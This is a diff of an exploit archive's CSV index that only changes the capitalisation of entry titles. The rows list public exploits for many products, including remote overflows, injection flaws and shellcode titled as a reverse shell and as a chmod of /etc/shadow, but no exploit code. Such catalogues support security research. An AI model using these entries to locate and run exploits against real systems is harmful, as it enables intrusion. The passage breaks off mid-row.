Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 20472,platforms/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,multiple,remote,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service",2000-12-06,blackangels,hardware,dos,0 -20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 Plugin - Persistent Cross-Site Scripting",2012-08-13,"Chris Kellum",php,webapps,0 +20474,platforms/php/webapps/20474.txt,"Wordpress RSVPMaker 2.5.4 Plugin - Persistent Cross-Site Scripting",2012-08-13,"Chris Kellum",php,webapps,0 20476,platforms/php/webapps/20476.txt,"Hotel Booking Portal 0.1 - Multiple Vulnerabilities",2012-08-13,"Yakir Wizman",php,webapps,0 20477,platforms/windows/webapps/20477.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway - Cross-Site Request Forgery",2012-08-13,"Nir Valtman",windows,webapps,0 20478,platforms/windows/webapps/20478.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway - Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0 @@ -17827,7 +17827,7 @@ id,file,description,date,author,platform,type,port 20504,platforms/cgi/remote/20504.html,"Leif M. Wright - ad.cgi 1.0 Unchecked Input",2000-12-11,rpc,cgi,remote,0 20505,platforms/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 - PIN Brute-Force",2000-12-14,@stake,palm_os,local,0 20506,platforms/cgi/remote/20506.html,"Leif M. Wright simplestguest.cgi 2.0 - Remote Command Execution",2000-12-14,suid,cgi,remote,0 -20507,platforms/multiple/remote/20507.txt,"alex heiphetz group ezshopper 2.0/3.0 - Directory Traversal",2000-12-13,Nsfocus,multiple,remote,0 +20507,platforms/multiple/remote/20507.txt,"alex heiphetz Group eZshopper 2.0/3.0 - Directory Traversal",2000-12-13,Nsfocus,multiple,remote,0 20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service Attack",1999-04-27,"Simon Helson",windows,dos,0 20509,platforms/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 - SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos,0 20510,platforms/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Buffer Overflow",2000-12-12,"Joe Testa",windows,remote,0 @@ -17889,7 +17889,7 @@ id,file,description,date,author,platform,type,port 20567,platforms/cgi/remote/20567.txt,"php php/fi 2.0 - Directory Traversal",1997-04-16,Shamanski,cgi,remote,0 20568,platforms/sco/remote/20568.txt,"Skunkware 2.0 - view-source Directory Traversal",1997-04-16,myst,sco,remote,0 20569,platforms/linux/remote/20569.c,"mICQ 0.4.6 - Remote Buffer Overflow",2001-01-17,"tHE rECIdjVO",linux,remote,0 -20570,platforms/cgi/remote/20570.txt,"Sambar Server 4.1 beta - Admin Access",1998-06-10,"Michiel de Weerd",cgi,remote,0 +20570,platforms/cgi/remote/20570.txt,"Sambar Server 4.1 Beta - Admin Access",1998-06-10,"Michiel de Weerd",cgi,remote,0 20571,platforms/windows/remote/20571.txt,"Microsoft Outlook 2000 0/98 0/Express 5.5 - Concealed Attachment",2001-01-17,http-equiv,windows,remote,0 20573,platforms/php/webapps/20573.html,"Jaow CMS 2.3 - Cross-Site Request Forgery",2012-08-17,DaOne,php,webapps,0 20574,platforms/php/webapps/20574.txt,"Social Engine 4.2.5 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,php,webapps,0 @@ -18022,7 +18022,7 @@ id,file,description,date,author,platform,type,port 20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - Cross-Site Scripting / Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal",2001-03-27,"UkR hacking team",cgi,remote,0 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 - Logging Output File",2001-03-23,KimYongJun,solaris,local,0 -20716,platforms/windows/remote/20716.txt,"apache tomcat 3.0 - Directory Traversal",2001-03-28,lovehacker,windows,remote,0 +20716,platforms/windows/remote/20716.txt,"Apache tomcat 3.0 - Directory Traversal",2001-03-28,lovehacker,windows,remote,0 20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote,0 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 - Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0 / Weblogic Server 5.1 - URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote,0 @@ -18030,7 +18030,7 @@ id,file,description,date,author,platform,type,port 20721,platforms/linux/local/20721.c,"Linux Kernel 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)",2001-03-27,"Wojciech Purczynski",linux,local,0 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 - JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 - User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0 -20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0 +20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0 20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Arbitrary Commands",2001-04-02,"UkR hacking team",cgi,remote,0 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote,0 20727,platforms/linux/remote/20727.c,"Ntpd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0 @@ -18084,10 +18084,10 @@ id,file,description,date,author,platform,type,port 20778,platforms/linux/local/20778.sh,"ISC INN 2.x - Command-Line Buffer Overflow (2)",2001-04-18,"Enrique A.",linux,local,0 20779,platforms/windows/dos/20779.pl,"Oracle 8 Server - 'TNSLSNR80.EXE' Denial of Service",2001-04-18,r0ot@runbox.com,windows,dos,0 20780,platforms/cgi/remote/20780.c,"CrossWind CyberScheduler 2.1 - websyncd Remote Buffer Overflow",2001-04-17,"Enrique A.",cgi,remote,0 -20781,platforms/linux/local/20781.txt,"SUSE 7.0 - KFM Insecure TMP File Creation",2001-04-18,"Paul Starzetz",linux,local,0 +20781,platforms/linux/local/20781.txt,"SuSE 7.0 - KFM Insecure TMP File Creation",2001-04-18,"Paul Starzetz",linux,local,0 20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 and OE 5.5 - XML Stylesheets Active Scripting",2001-04-20,"Georgi Guninski",windows,remote,0 20783,platforms/windows/dos/20783.txt,"Rit Research Labs 'The Bat!' 1.x - Missing Linefeeds Denial of Service",2001-04-18,3APA3A,windows,dos,0 -20784,platforms/windows/dos/20784.cpp,"WireShark 1.8.2 / 1.6.0 - Buffer Overflow PoC",2012-08-24,X-h4ck,windows,dos,0 +20784,platforms/windows/dos/20784.cpp,"Wireshark 1.8.2 / 1.6.0 - Buffer Overflow PoC",2012-08-24,X-h4ck,windows,dos,0 20785,platforms/php/webapps/20785.txt,"Ad Manager Pro - Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",php,webapps,0 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 20788,platforms/php/webapps/20788.txt,"AB Banner Exchange - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 @@ -18162,7 +18162,7 @@ id,file,description,date,author,platform,type,port 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 - (site.php id parameter) SQL Injection",2012-08-27,JIKO,php,webapps,0 20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET PoC",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 -20862,platforms/php/webapps/20862.txt,"WordPress Count per Day Plugin 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0 +20862,platforms/php/webapps/20862.txt,"Wordpress Count per Day Plugin 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0 20865,platforms/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution",2012-08-27,Metasploit,java,remote,0 @@ -18217,7 +18217,7 @@ id,file,description,date,author,platform,type,port 20915,platforms/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Privilege Escalation",2012-08-29,"Craig Freyman",windows,local,0 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - SEH 0verwrite",2012-08-29,Ciph3r,windows,dos,0 -20918,platforms/php/webapps/20918.txt,"WordPress HD Webplayer 1.1 Plugin - SQL Injection",2012-08-29,JoinSe7en,php,webapps,0 +20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 Plugin - SQL Injection",2012-08-29,JoinSe7en,php,webapps,0 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0 20923,platforms/unix/local/20923.c,"LPRng 3.6.x - Failure To Drop Supplementary Groups",2001-06-07,zen-parse,unix,local,0 @@ -18253,7 +18253,7 @@ id,file,description,date,author,platform,type,port 20956,platforms/php/webapps/20956.txt,"vBulletin Yet Another Awards System 4.0.2 - SQL Injection",2012-08-31,Backsl@sh/Dan,php,webapps,0 20957,platforms/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 - Remote Format String",2012-08-31,coolkaveh,windows,dos,0 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 - Reverse Proxy",2001-07-18,"Paul Nasrat",linux,remote,0 -21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - Telnetd Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 +21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - TelnetD Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 / 3.1.9 - Cross-Site Scripting",2012-08-31,"Mike Eduard",windows,webapps,0 20960,platforms/unix/local/20960.c,"Juergen Schoenwaelder scotty 2.1.x - ntping Buffer Overflow",2001-06-13,"Larry W. Cashdollar",unix,local,0 20961,platforms/unix/local/20961.sh,"KDE KTVision 0.1 - File Overwrite",2001-06-21,IhaQueR,unix,local,0 @@ -18279,7 +18279,7 @@ id,file,description,date,author,platform,type,port 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 - (Build 8410) Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 20982,platforms/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution",2001-06-28,"Igor Dobrovitski",cgi,remote,0 20983,platforms/php/webapps/20983.pl,"Joomla Spider Calendar Lite (com_spidercalendar) - SQL Injection",2012-09-01,D4NB4R,php,webapps,0 -20984,platforms/osx/remote/20984.txt,"Apple Mac OS X 10 - nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",osx,remote,0 +20984,platforms/osx/remote/20984.txt,"Apple Mac OSX 10 - nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",osx,remote,0 20985,platforms/php/local/20985.php,"PHP 4.x - SafeMode Arbitrary File Execution",2001-06-30,"Wojciech Purczynski",php,local,0 20986,platforms/linux/local/20986.c,"Xvt 2.1 - Buffer Overflow",2001-07-02,"Christophe Bailleux",linux,local,0 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0 @@ -18389,7 +18389,7 @@ id,file,description,date,author,platform,type,port 21099,platforms/windows/dos/21099.c,"Microsoft Windows 2000 - RunAs Service Denial of Services",2001-12-11,Camisade,windows,dos,0 21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0 21101,platforms/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link",2001-09-07,"Digital Shadow",unix,local,0 -21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote,0 +21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 Beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote,0 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,hardware,dos,0 21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0 21105,platforms/unix/local/21105.c,"Digital Unix 4.0 - MSGCHK Buffer Overflow",2001-09-05,seo,unix,local,0 @@ -18440,7 +18440,7 @@ id,file,description,date,author,platform,type,port 21154,platforms/multiple/remote/21154.pl,"ActivePerl 5.6.1 - perlIIS.dll Buffer Overflow (3)",2001-11-15,Sapient2003,multiple,remote,0 21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHP-Nuke Addon - Metacharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",php,remote,0 21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 - Same Origin Policy Circumvention",2001-11-15,"Georgi Guninski",windows,remote,0 -21157,platforms/php/webapps/21157.txt,"bharat mediratta gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",php,webapps,0 +21157,platforms/php/webapps/21157.txt,"bharat mediratta Gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",php,webapps,0 21158,platforms/linux/local/21158.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,linux,local,0 21159,platforms/linux/local/21159.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow",2001-11-21,IhaQueR@IRCnet,linux,local,0 21160,platforms/multiple/remote/21160.txt,"ibm informix Web datablade 3.x/4.1 - Directory Traversal",2001-11-22,"Beck Mr.R",multiple,remote,0 @@ -18469,7 +18469,7 @@ id,file,description,date,author,platform,type,port 21183,platforms/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal",2001-12-17,"A. Ramos",cgi,remote,0 21184,platforms/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 - Debug Mode Cross-Site Scripting",2001-12-17,"Tamer Sahin",cgi,webapps,0 21185,platforms/unix/remote/21185.sh,"QPopper 4.0.x - PopAuth Trace File Shell Command Execution",2001-12-18,IhaQueR,unix,remote,0 -21186,platforms/hardware/remote/21186.txt,"ZyXEL Prestige 681 SDSL Router - IP Fragment Reassembly",2001-12-18,"Przemyslaw Frasunek",hardware,remote,0 +21186,platforms/hardware/remote/21186.txt,"ZYXEL Prestige 681 SDSL Router - IP Fragment Reassembly",2001-12-18,"Przemyslaw Frasunek",hardware,remote,0 21187,platforms/cgi/webapps/21187.txt,"Aktivate 1.0 3 - Shopping Cart Cross-Site Scripting",2001-12-18,"Tamer Sahin",cgi,webapps,0 21188,platforms/windows/remote/21188.c,"Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (1)",2001-12-20,"Gabriel Maggiotti",windows,remote,0 21189,platforms/windows/remote/21189.c,"Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (2)",2001-12-20,JOCANOR,windows,remote,0 @@ -18535,9 +18535,9 @@ id,file,description,date,author,platform,type,port 21249,platforms/cgi/remote/21249.txt,"Agora.CGI 3/4 - Debug Mode Full Path Disclosure",2002-01-28,superpetz,cgi,remote,0 21250,platforms/php/webapps/21250.txt,"Webify Blog - Arbitrary File Deletion",2012-09-11,JIKO,php,webapps,0 21251,platforms/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,php,webapps,0 -21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - reverse_shell (tcp_10.1.1.2_0x1337) shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 -21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 -21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 +21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - reverse_shell (tcp_10.1.1.2_0x1337) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 +21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 +21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 21257,platforms/cgi/webapps/21257.txt,"AHG Search Engine 1.0 - Search.cgi Arbitrary Command Execution",2002-01-29,"Aleksey Sintsov",cgi,webapps,0 21258,platforms/linux/local/21258.bat,"Microsoft Windows 2000/NT 4 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation",2002-01-30,"Taeho Oh",linux,local,0 @@ -18556,7 +18556,7 @@ id,file,description,date,author,platform,type,port 21272,platforms/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.00 - SQL Injection",2012-09-12,Vulnerability-Lab,asp,webapps,0 21273,platforms/php/webapps/21273.txt,"Ezylog Photovoltaic Management Server - Multiple Vulnerabilities",2012-09-12,"Roberto Paleari",php,webapps,0 21274,platforms/windows/remote/21274.c,"MIRC 2.x/3.x/4.x/5.x - Nick Buffer Overflow",2002-02-03,"James Martin",windows,remote,0 -21275,platforms/osx/dos/21275.c,"ICQ For MacOS X 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos,0 +21275,platforms/osx/dos/21275.c,"ICQ For Mac OSX 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos,0 21276,platforms/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,multiple,remote,0 21277,platforms/php/webapps/21277.txt,"Portix-PHP 0.4 - 'index.php' Directory Traversal",2002-02-04,frog,php,webapps,0 21278,platforms/php/webapps/21278.txt,"Portix-PHP 0.4 - View.php Directory Traversal",2002-02-04,frog,php,webapps,0 @@ -18657,7 +18657,7 @@ id,file,description,date,author,platform,type,port 21378,platforms/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch - Default SNMP Community",2002-04-15,"Michael Rawls",hardware,remote,0 21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 21380,platforms/php/webapps/21380.php,"Burning Board 1.1.1 - URL Parameter Manipulation",2002-04-15,SeazoN,php,webapps,0 -21381,platforms/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,php,webapps,0 +21381,platforms/php/webapps/21381.txt,"XGB GuestBook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,php,webapps,0 21382,platforms/php/webapps/21382.txt,"XGB 1.2 - Remote Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 21383,platforms/php/webapps/21383.txt,"xNewsletter 1.0 - Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 21384,platforms/multiple/remote/21384.txt,"Demarc PureSecure 1.0.5 - Authentication Check SQL Injection",2002-04-15,"pokleyzz sakamaniaka",multiple,remote,0 @@ -18669,8 +18669,8 @@ id,file,description,date,author,platform,type,port 21390,platforms/cgi/remote/21390.txt,"Sambar Server 5.1 - Script Source Disclosure",2002-04-17,pgrundl,cgi,remote,0 21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 - Poll Content Manipulation",2002-04-18,"Daniel Nyström",php,webapps,0 21392,platforms/windows/webapps/21392.txt,"Spiceworks 6.0.00993 - Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps,0 -21393,platforms/php/webapps/21393.txt,"WordPress Plugin wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 -21394,platforms/windows/webapps/21394.txt,"sonicwall email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps,0 +21393,platforms/php/webapps/21393.txt,"Wordpress Plugin wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 +21394,platforms/windows/webapps/21394.txt,"SonicWALL email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps,0 21395,platforms/hardware/webapps/21395.txt,"Fortigate UTM WAF Appliance - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,hardware,webapps,0 21396,platforms/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps,0 21397,platforms/php/webapps/21397.txt,"PVote 1.0/1.5 - Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",php,webapps,0 @@ -18682,7 +18682,7 @@ id,file,description,date,author,platform,type,port 21403,platforms/php/webapps/21403.txt,"PostBoard 2.0 - Topic Title Script Execution",2002-04-19,gcsb,php,webapps,0 21404,platforms/windows/dos/21404.htm,"Microsoft Internet Explorer 5/6 - Self-Referential Object Denial of Service",2002-04-20,"Matthew Murphy",windows,dos,0 21405,platforms/cgi/webapps/21405.txt,"Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting",2002-04-20,BrainRawt,cgi,webapps,0 -21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 - Script Injection",2002-04-21,"markus arndt",cgi,webapps,0 +21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's GuestBook 1.1 - Script Injection",2002-04-21,"markus arndt",cgi,webapps,0 21407,platforms/bsd/local/21407.c,"OS X 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 21409,platforms/unix/dos/21409.pl,"PsyBNC 2.3 - Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos,0 @@ -18728,7 +18728,7 @@ id,file,description,date,author,platform,type,port 21450,platforms/multiple/remote/21450.txt,"id Software Quake II Server 3.20/3.21 - Remote Information Disclosure",2002-05-15,Redix,multiple,remote,0 21451,platforms/windows/remote/21451.txt,"Opera 5.12/6.0 - Frame Location Same Origin Policy Circumvention",2002-05-15,"Andreas Sandblad",windows,remote,0 21452,platforms/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 - Content-Disposition Handling File Execution",2002-05-15,"Jani Laatikainen",windows,remote,0 -21453,platforms/multiple/remote/21453.txt,"SonicWall SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",multiple,remote,0 +21453,platforms/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",multiple,remote,0 21454,platforms/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,php,webapps,0 21455,platforms/asp/webapps/21455.txt,"Hosting Controller 1.x - DSNManager Directory Traversal",2002-05-17,hdlkha,asp,webapps,0 21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",hardware,remote,0 @@ -18835,9 +18835,9 @@ id,file,description,date,author,platform,type,port 21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.cgi Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps,0 21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1)",2002-06-17,"Gobbles Security",multiple,remote,0 21560,platforms/multiple/remote/21560.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (2)",2002-06-17,"Gobbles Security",multiple,remote,0 -21561,platforms/hardware/dos/21561.txt,"ZyXEL Prestige 642R - Malformed Packet Denial of Service",2002-07-17,"Kistler Ueli",hardware,dos,0 +21561,platforms/hardware/dos/21561.txt,"ZYXEL Prestige 642R - Malformed Packet Denial of Service",2002-07-17,"Kistler Ueli",hardware,dos,0 21562,platforms/java/webapps/21562.txt,"Wolfram Research webMathematica 4.0 - File Disclosure",2002-06-17,"Andrew Badr",java,webapps,0 -21563,platforms/php/webapps/21563.txt,"OSCommerce 2.1 - Remote File Inclusion",2002-06-16,"Tim Vandermeerch",php,webapps,0 +21563,platforms/php/webapps/21563.txt,"osCommerce 2.1 - Remote File Inclusion",2002-06-16,"Tim Vandermeerch",php,webapps,0 21564,platforms/php/webapps/21564.txt,"PHP-Address 0.2 e - Remote File Inclusion",2002-06-17,"Tim Vandermeerch",php,webapps,0 21565,platforms/unix/local/21565.pl,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,unix,local,0 21566,platforms/unix/local/21566.c,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local,0 @@ -18870,7 +18870,7 @@ id,file,description,date,author,platform,type,port 21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos,0 21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0 21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow",2002-07-03,anonymous,windows,remote,0 -21596,platforms/osx/remote/21596.txt,"MacOS X 10.1.x - SoftwareUpdate Arbitrary Package Installation",2002-07-08,"Russell Harding",osx,remote,0 +21596,platforms/osx/remote/21596.txt,"Mac OSX 10.1.x - SoftwareUpdate Arbitrary Package Installation",2002-07-08,"Russell Harding",osx,remote,0 21597,platforms/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure",2002-07-08,Securiteinfo.com,windows,remote,0 21598,platforms/linux/dos/21598.c,"Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion",2002-07-08,"Paul Starzetz",linux,dos,0 21599,platforms/windows/remote/21599.txt,"Working Resources BadBlue 1.7.3 - cleanSearchString() Cross-Site Scripting",2002-07-08,"Matthew Murphy",windows,remote,0 @@ -18912,7 +18912,7 @@ id,file,description,date,author,platform,type,port 21634,platforms/windows/dos/21634.c,"SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (1)",2002-07-23,Kyuzo,windows,dos,0 21635,platforms/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (2)",2002-07-23,"andrea lisci",windows,remote,0 21636,platforms/windows/remote/21636.txt,"Opera 6.0.1 / Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion",2002-07-23,"Andreas Sandblad",windows,remote,0 -21637,platforms/hardware/dos/21637.c,"ZyXEL Prestige 642R Router - Malformed IP Packet Denial of Service",2002-07-24,"Jeff w. Roberson",hardware,dos,0 +21637,platforms/hardware/dos/21637.c,"ZYXEL Prestige 642R Router - Malformed IP Packet Denial of Service",2002-07-24,"Jeff w. Roberson",hardware,dos,0 21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 - JavaScript URL Host Spoofing Arbitrary Cookie Access",2002-07-24,"Andreas Sandblad",multiple,remote,0 21639,platforms/windows/remote/21639.c,"VMware 